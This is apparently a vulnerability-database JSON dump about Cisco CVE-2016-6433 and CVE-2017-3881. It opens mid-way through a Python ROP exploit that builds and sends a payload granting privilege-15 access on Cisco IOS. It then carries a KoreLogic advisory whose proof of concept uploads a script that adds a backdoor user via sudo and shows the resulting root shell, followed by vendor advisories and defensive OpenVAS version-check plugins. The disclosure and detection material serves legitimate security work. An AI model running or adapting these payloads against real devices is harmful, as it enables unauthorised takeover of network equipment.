'\\x00\\x00\\x99\\x9c'\t# +12 set address of func that rets 1\r\nelse:\r\n\tpayload +=\t'\\x00\\x04\\xeA\\xe0'\t# unset \r\npayload += 'BBBB'\t\t\t\t\t# +16(+0) r1 points here at second gadget\r\npayload += '\\x00\\xe1\\xa9\\xf4' \t\t# +4 second gadget address 0x00e1a9f4: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;\r\npayload += 'CCCC'\t\t\t\t\t# +8 \r\npayload += 'DDDD'\t\t\t\t\t# +12\r\npayload += 'EEEE'\t\t\t\t\t# +16(+0) r1 points here at third gadget\r\npayload += '\\x00\\x06\\x7b\\x5c'\t\t# +20(+4) third gadget address. 0x00067b5c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr; \r\npayload += '\\x02\\x3d\\x55\\xc8'\t\t# +8 r1+8 = 0x23d55c8\r\npayload += 'FFFF'\t\t\t\t\t# +12 \r\npayload += 'GGGG'\t\t\t\t\t# +16(+0) r1 points here at fourth gadget \r\npayload += '\\x00\\x6c\\xb3\\xa0' \t\t# +20(+4) fourth gadget address 0x006cb3a0: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;\r\nif set_credless:\r\n\tpayload += '\\x00\\x27\\x0b\\x94'\t# +8 address of the replacing function that returns 15 (our desired privilege level). 
0x00270b94: li r3, 0xf; blr; \r\nelse:\r\n\tpayload += '\\x00\\x04\\xe7\\x78'\t# unset\r\npayload += 'HHHH'\t\t\t\t\t# +12\r\npayload += 'IIII'\t\t\t\t\t# +16(+0) r1 points here at fifth gadget\r\npayload += '\\x01\\x4a\\xcf\\x98'\t\t# +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;\r\npayload += 'JJJJ'\t\t\t\t\t# +8 r1 points here at third gadget\r\npayload += 'KKKK'\t\t\t\t\t# +12\r\npayload += 'LLLL'\t\t\t\t\t# +16\r\npayload += '\\x01\\x14\\xe7\\xec'\t\t# +20 original execution flow return addr\r\npayload += ':15:' + '\\xff\\xf0'\r\n\r\ns.send(payload)\r\n\r\nprint '[+] All done'\r\n\r\ns.close()\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92932", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "korelogic": [{"lastseen": "2023-06-03T18:46:46", "description": "1. Vulnerability Details\n\n Affected Vendor: Cisco\n Affected Product: Firepower Threat Management Console\n Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)\n Platform: Embedded Linux\n CWE Classification: CWE-434: Unrestricted Upload of File with Dangerous\n Type, CWE-94: Improper Control of Generation of Code\n Impact: Arbitrary Code Execution\n Attack vector: HTTP\n CVE-ID: CVE-2016-6433\n\n2. Vulnerability Description\n\n An authenticated user can run arbitrary system commands as\n the www user which leads to root.\n\n3. Technical Description\n\n A valid session and CSRF token is required. 
The webserver runs as\n a non-root user which is permitted to sudo commands as root with\n no password.\n\n POST /DetectionPolicy/rules/rulesimport.cgi?no_mojo=1 HTTP/1.1\n Host: 1.3.3.7\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) Gecko/20100101 Firefox/45.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate, br\n DNT: 1\n Cookie: CGISESSID=4919a7838198009bba48f6233d0bd1c6\n Connection: close\n Content-Type: multipart/form-data; boundary=---------------------------15519792567789791301241925798\n Content-Length: 813\n\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"manual_update\"\n\n 1\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"source\"\n\n file\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"file\"; filename=\"Sourcefire_Rule_Update-2016-03-04-001-vrt.sh\"\n Content-Type: application/octet-stream\n\n sudo useradd -G ldapgroup -p `openssl passwd -1 korelogic` korelogic\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"action_submit\"\n\n Import\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"sf_action_id\"\n\n 8c6059ae8dbedc089877b16b7be2ae7f\n -----------------------------15519792567789791301241925798--\n\n\n HTTP/1.1 200 OK\n Date: Sat, 23 Apr 2016 13:38:01 GMT\n Server: Apache\n Vary: Accept-Encoding\n X-Frame-Options: SAMEORIGIN\n Content-Length: 49998\n Connection: close\n Content-Type: text/html; charset=utf-8\n\n ...\n\n $ ssh korelogic@1.3.3.7\n Password:\n\n Copyright 2004-2016, Cisco and/or its affiliates. 
All rights reserved.\n Cisco is a registered trademark of Cisco Systems, Inc.\n All other trademarks are property of their respective owners.\n\n Cisco Fire Linux OS v6.0.1 (build 37)\n Cisco Firepower Management Center for VMWare v6.0.1 (build 1213)\n\n Could not chdir to home directory /Volume/home/korelogic: No such file or directory\n korelogic@firepower:/$ sudo su -\n Password:\n root@firepower:~#\n\n4. Mitigation and Remediation Recommendation\n\n The vendor has acknowledged this vulnerability but has\n not issued a fix. Vendor acknowledgement available at:\n https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc2\n\n5. Credit\n\n This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.\n\n6. Disclosure Timeline\n\n 2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco.\n 2016.06.30 - Cisco acknowledges receipt of vulnerability report.\n 2016.07.20 - KoreLogic and Cisco discuss remediation timeline for\n this vulnerability and for 3 others reported in the\n same product.\n 2016.08.12 - 30 business days have elapsed since the vulnerability was\n reported to Cisco.\n 2016.09.02 - 45 business days have elapsed since the vulnerability was\n reported to Cisco.\n 2016.09.09 - KoreLogic asks for an update on the status of the\n remediation efforts.\n 2016.09.15 - Cisco confirms remediation is underway and soon to be\n completed.\n 2016.09.28 - Cisco informs KoreLogic that the acknowledgement details\n will be released publicly on 2016.10.05.\n 2016.10.05 - Public disclosure.\n\n7. 
Proof of Concept\n\n See Technical Description", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-10-05T00:00:00", "type": "korelogic", "title": "Cisco Firepower Threat Management Console Remote Command Execution Leading to Root Access", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6433"], "modified": "2016-10-05T00:00:00", "id": "KL-001-2016-007", "href": "https://korelogic.com/Resources/Advisories/KL-001-2016-007.txt", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cisco": [{"lastseen": "2023-05-25T14:46:05", "description": "A vulnerability in Cisco Firepower Threat Management Console could allow an authenticated, remote attacker to execute arbitrary commands on a targeted system.\n\nThe vulnerability exists because parameters sent to the web application are not properly validated. This may lead an authenticated web user to run arbitrary system commands as the www user account on the server. 
An attacker with user privileges on the web application may be able to leverage this vulnerability to gain access to the underlying operating system.\n\nCisco has released software updates that address this vulnerability. Workarounds that address this vulnerability are not available. \n\nThis advisory is available at the following link: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc[\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc\"]", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-10-05T16:00:00", "type": "cisco", "title": "Cisco Firepower Threat Management Console Remote Command Execution Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6433"], "modified": "2016-10-05T16:00:00", "id": "CISCO-SA-20161005-FTMC", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-24T08:36:52", "description": "A vulnerability in the Cisco Cluster Management Protocol 
(CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges.\n\nThe Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors:\n\n The failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device, and\nThe incorrect processing of malformed CMP-specific Telnet options.\n An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device.\n\nCisco has released software updates that address this vulnerability. 
There are no workarounds that address this vulnerability.\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp\"]", "cvss3": {}, "published": "2017-03-17T16:00:00", "type": "cisco", "title": "Cisco IOS and IOS XE Software Cluster Management Protocol Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-3881"], "modified": "2019-04-17T18:47:43", "id": "CISCO-SA-20170317-CMP", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp", "cvss": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}}], "openvas": [{"lastseen": "2020-04-07T18:45:01", "description": "A vulnerability in Cisco Firepower Threat Management Console could allow an\n authenticated, remote attacker to execute arbitrary commands on a targeted system.", "cvss3": {}, "published": "2016-10-06T00:00:00", "type": "openvas", "title": "Cisco Firepower Threat Management Console Remote Command Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6433"], "modified": "2020-04-03T00:00:00", "id": "OPENVAS:1361412562310106333", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106333", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Cisco Firepower Threat Management Console Remote Command Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at 
your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:firepower_management_center\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106333\");\n script_cve_id(\"CVE-2016-6433\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_version(\"2020-04-03T09:54:35+0000\");\n\n script_name(\"Cisco Firepower Threat Management Console Remote Command Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"A vulnerability in Cisco Firepower Threat Management Console could allow an\n authenticated, remote attacker to execute arbitrary commands on a targeted system.\");\n\n script_tag(name:\"insight\", value:\"The vulnerability exists because parameters sent to the web application are\n not properly validated. 
This may lead an authenticated web user to run arbitrary system commands as the www user\n account on the server.\");\n\n script_tag(name:\"impact\", value:\"An attacker with user privileges on the web application may be able to\n leverage this vulnerability to gain access to the underlying operating system.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 09:54:35 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-06 10:54:17 +0700 (Thu, 06 Oct 2016)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_firepower_management_center_consolidation.nasl\");\n script_mandatory_keys(\"cisco/firepower_management_center/detected\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! version = get_app_version( cpe:CPE, nofork:TRUE ) ) exit( 0 );\n\naffected = make_list(\n '5.2.0',\n '5.3.0',\n '5.3.0.2',\n '5.3.0.3',\n '5.3.0.4',\n '5.3.1',\n '5.3.1.3',\n '5.3.1.4',\n '5.3.1.5',\n '5.3.1.6',\n '5.4.1.3',\n '5.4.1.5',\n '5.4.1.4',\n '5.4.1.2',\n '5.4.1.1',\n '5.4.1',\n '5.4.0',\n '5.4.0.2',\n '5.4.1.6',\n '6.0.1' );\n\nforeach af ( affected ) {\n if( version == af ) {\n report = report_fixed_ver( installed_version:version, fixed_version: \"See advisory\" );\n security_message( port:0, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-10-09T15:15:35", "description": "A vulnerability in the Cisco Cluster Management Protocol (CMP) processing\ncode in Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an\naffected device or remotely execute code with elevated privileges.", "cvss3": {}, "published": "2017-03-20T00:00:00", "type": "openvas", 
"title": "Cisco IOS XE Software Cluster Management Protocol Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-3881"], "modified": "2019-10-09T00:00:00", "id": "OPENVAS:1361412562310106671", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106671", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Cisco IOS XE Software Cluster Management Protocol Remote Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/o:cisco:ios_xe\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106671\");\n script_cve_id(\"CVE-2017-3881\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2019-10-09T06:43:33+0000\");\n\n script_name(\"Cisco IOS XE Software Cluster Management Protocol Remote Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"A vulnerability in the Cisco Cluster Management Protocol (CMP) processing\ncode in Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an\naffected device or remotely execute code with elevated privileges.\");\n\n script_tag(name:\"insight\", value:\"The Cluster Management Protocol utilizes Telnet internally as a signaling\nand command protocol between cluster members. 
The vulnerability is due to the combination of two factors:\n\n - The failure to restrict the use of CMP-specific Telnet options only to internal, local communications between\ncluster members and instead accept and process such options over any Telnet connection to an affected device, and\n\n - The incorrect processing of malformed CMP-specific Telnet options.\n\nAn attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing\na Telnet session with an affected Cisco device configured to accept Telnet connections.\");\n\n script_tag(name:\"impact\", value:\"An exploit could allow an attacker to execute arbitrary code and obtain full\ncontrol of the device or cause a reload of the affected device.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2019-10-09 06:43:33 +0000 (Wed, 09 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-20 11:02:32 +0700 (Mon, 20 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_ios_xe_version.nasl\");\n script_mandatory_keys(\"cisco_ios_xe/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\naffected = make_list(\n '2.2.0',\n '2.2.1',\n '2.2.2',\n '2.2.3',\n '2.3.0',\n '2.3.1',\n '2.3.1t',\n '2.3.2',\n '2.4.0',\n '2.4.1',\n '2.4.2',\n '2.4.3',\n '2.5.0',\n '2.5.1',\n '2.6.0',\n '2.6.1',\n '3.1.0SG',\n '3.1.1SG',\n '3.2.0SG',\n '3.2.0XO',\n '3.2.10SG',\n '3.2.11SG',\n '3.2.1SG',\n '3.2.2SG',\n '3.2.3SG',\n '3.2.4SG',\n '3.2.5SG',\n '3.2.6SG',\n '3.2.7SG',\n '3.2.8SG',\n '3.2.9SG',\n '3.3.0SG',\n '3.3.0SQ',\n '3.3.0XO',\n '3.3.1SG',\n '3.3.1SQ',\n '3.3.1XO',\n '3.3.2SG',\n '3.3.2XO',\n '3.4.0SG',\n '3.4.0SQ',\n 
'3.4.1SG',\n '3.4.1SQ',\n '3.4.2SG',\n '3.4.3SG',\n '3.4.4SG',\n '3.4.5SG',\n '3.4.6SG',\n '3.4.7SG',\n '3.4.7a.SG',\n '3.4.8SG',\n '3.4.9SG',\n '3.5.0E',\n '3.5.0SQ',\n '3.5.1E',\n '3.5.1SQ',\n '3.5.2E',\n '3.5.2SQ',\n '3.5.3E',\n '3.5.3SQ',\n '3.5.4SQ',\n '3.5.5SQ',\n '3.5.7SQ',\n '3.6.0E',\n '3.6.1E',\n '3.6.2E',\n '3.6.2a.E',\n '3.6.3E',\n '3.6.4E',\n '3.6.5E',\n '3.6.5a.E',\n '3.6.5b.E',\n '3.6.6E',\n '3.7.0E',\n '3.7.1E',\n '3.7.2E',\n '3.7.3E',\n '3.7.4E',\n '3.7.5E',\n '3.8.0E',\n '3.8.0EX',\n '3.8.1E',\n '3.8.1S',\n '3.8.2E',\n '3.8.3E',\n '3.9.0E',\n '3.9.1E');\n\nforeach af (affected) {\n if (version == af) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-09T15:13:00", "description": "A vulnerability in the Cisco Cluster Management Protocol (CMP) processing\ncode in Cisco IOS Software could allow an unauthenticated, remote attacker to cause a reload of an affected\ndevice or remotely execute code with elevated privileges.", "cvss3": {}, "published": "2017-03-20T00:00:00", "type": "openvas", "title": "Cisco IOS Software Cluster Management Protocol Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-3881"], "modified": "2019-10-09T00:00:00", "id": "OPENVAS:1361412562310106670", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106670", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Cisco IOS Software Cluster Management Protocol Remote Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the 
GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/o:cisco:ios\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106670\");\n script_cve_id(\"CVE-2017-3881\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2019-10-09T06:43:33+0000\");\n\n script_name(\"Cisco IOS Software Cluster Management Protocol Remote Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"A vulnerability in the Cisco Cluster Management Protocol (CMP) processing\ncode in Cisco IOS Software could allow an unauthenticated, remote attacker to cause a reload of an affected\ndevice or remotely execute code with elevated privileges.\");\n\n script_tag(name:\"insight\", value:\"The Cluster Management Protocol utilizes Telnet internally as a signaling\nand command protocol between cluster members. 
The vulnerability is due to the combination of two factors:\n\n - The failure to restrict the use of CMP-specific Telnet options only to internal, local communications between\ncluster members and instead accept and process such options over any Telnet connection to an affected device, and\n\n - The incorrect processing of malformed CMP-specific Telnet options.\n\nAn attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing\na Telnet session with an affected Cisco device configured to accept Telnet connections.\");\n\n script_tag(name:\"impact\", value:\"An exploit could allow an attacker to execute arbitrary code and obtain full\ncontrol of the device or cause a reload of the affected device.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2019-10-09 06:43:33 +0000 (Wed, 09 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-20 09:25:26 +0700 (Mon, 20 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_ssh_cisco_ios_get_version.nasl\");\n script_mandatory_keys(\"cisco_ios/version\", \"cisco_ios/image\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nimage = get_kb_item(\"cisco_ios/image\");\n\nif (!image || (image !~ \"^C23(5|6)0\" && image !~ \"^C29(18|28|60|70|75)\" && image !~ \"^C35(50|60)\" &&\n image !~ \"^C3750\" && image !~ \"^C4(0|5)00\" && image !~ \"^C49(00|28|48)\" &&\n image !~ \"^WS-CBS30(12|20|30|32|40)\" && image !~ \"^WS-CBS31(1|2|3)0\" && image !~ \"^IE(2|3|4|5)000\" &&\n image !~ \"^IE(3|4)010\"))\n exit(99);\n\nif( ! 
version = get_app_version( cpe:CPE ) ) exit( 0 );\n\naffected = make_list(\n '12.1(11)EA1',\n '12.1(11)EA1a',\n '12.1(12c)EA1',\n '12.1(12c)EA1a',\n '12.1(13)EA1',\n '12.1(13)EA1a',\n '12.1(13)EA1b',\n '12.1(13)EA1c',\n '12.1(14)AZ',\n '12.1(14)EA1',\n '12.1(14)EA1a',\n '12.1(14)EA1b',\n '12.1(19)EA1',\n '12.1(19)EA1a',\n '12.1(19)EA1b',\n '12.1(19)EA1c',\n '12.1(19)EA1d',\n '12.1(20)EA1',\n '12.1(20)EA1a',\n '12.1(20)EA2',\n '12.1(22)EA1',\n '12.1(22)EA10',\n '12.1(22)EA10a',\n '12.1(22)EA10b',\n '12.1(22)EA11',\n '12.1(22)EA12',\n '12.1(22)EA13',\n '12.1(22)EA14',\n '12.1(22)EA1a',\n '12.1(22)EA1b',\n '12.1(22)EA2',\n '12.1(22)EA3',\n '12.1(22)EA4',\n '12.1(22)EA4a',\n '12.1(22)EA5',\n '12.1(22)EA5a',\n '12.1(22)EA6',\n '12.1(22)EA6a',\n '12.1(22)EA7',\n '12.1(22)EA8',\n '12.1(22)EA8a',\n '12.1(22)EA9',\n '12.1(6)EA1',\n '12.1(8)EA1c',\n '12.1(9)EA1',\n '12.2(137)SG',\n '12.2(144)SG',\n '12.2(18)S',\n '12.2(18)SE',\n '12.2(18)SE1',\n '12.2(20)EU',\n '12.2(20)EU1',\n '12.2(20)EU2',\n '12.2(20)EWA',\n '12.2(20)EWA1',\n '12.2(20)EWA2',\n '12.2(20)EWA3',\n '12.2(20)EWA4',\n '12.2(20)EX',\n '12.2(20)SE',\n '12.2(20)SE1',\n '12.2(20)SE2',\n '12.2(20)SE3',\n '12.2(20)SE4',\n '12.2(25)EW',\n '12.2(25)EWA',\n '12.2(25)EWA1',\n '12.2(25)EWA10',\n '12.2(25)EWA11',\n '12.2(25)EWA12',\n '12.2(25)EWA13',\n '12.2(25)EWA14',\n '12.2(25)EWA2',\n '12.2(25)EWA3',\n '12.2(25)EWA4',\n '12.2(25)EWA5',\n '12.2(25)EWA6',\n '12.2(25)EWA7',\n '12.2(25)EWA8',\n '12.2(25)EWA9',\n '12.2(25)EY',\n '12.2(25)EY1',\n '12.2(25)EY2',\n '12.2(25)EY3',\n '12.2(25)EY4',\n '12.2(25)EZ',\n '12.2(25)EZ1',\n '12.2(25)FX',\n '12.2(25)FY',\n '12.2(25)FZ',\n '12.2(25)S',\n '12.2(25)S1',\n '12.2(25)SE',\n '12.2(25)SE1',\n '12.2(25)SE2',\n '12.2(25)SE3',\n '12.2(25)SEA',\n '12.2(25)SEB',\n '12.2(25)SEB1',\n '12.2(25)SEB2',\n '12.2(25)SEB3',\n '12.2(25)SEB4',\n '12.2(25)SEC',\n '12.2(25)SEC1',\n '12.2(25)SEC2',\n '12.2(25)SED',\n '12.2(25)SED1',\n '12.2(25)SEE',\n '12.2(25)SEE1',\n '12.2(25)SEE2',\n 
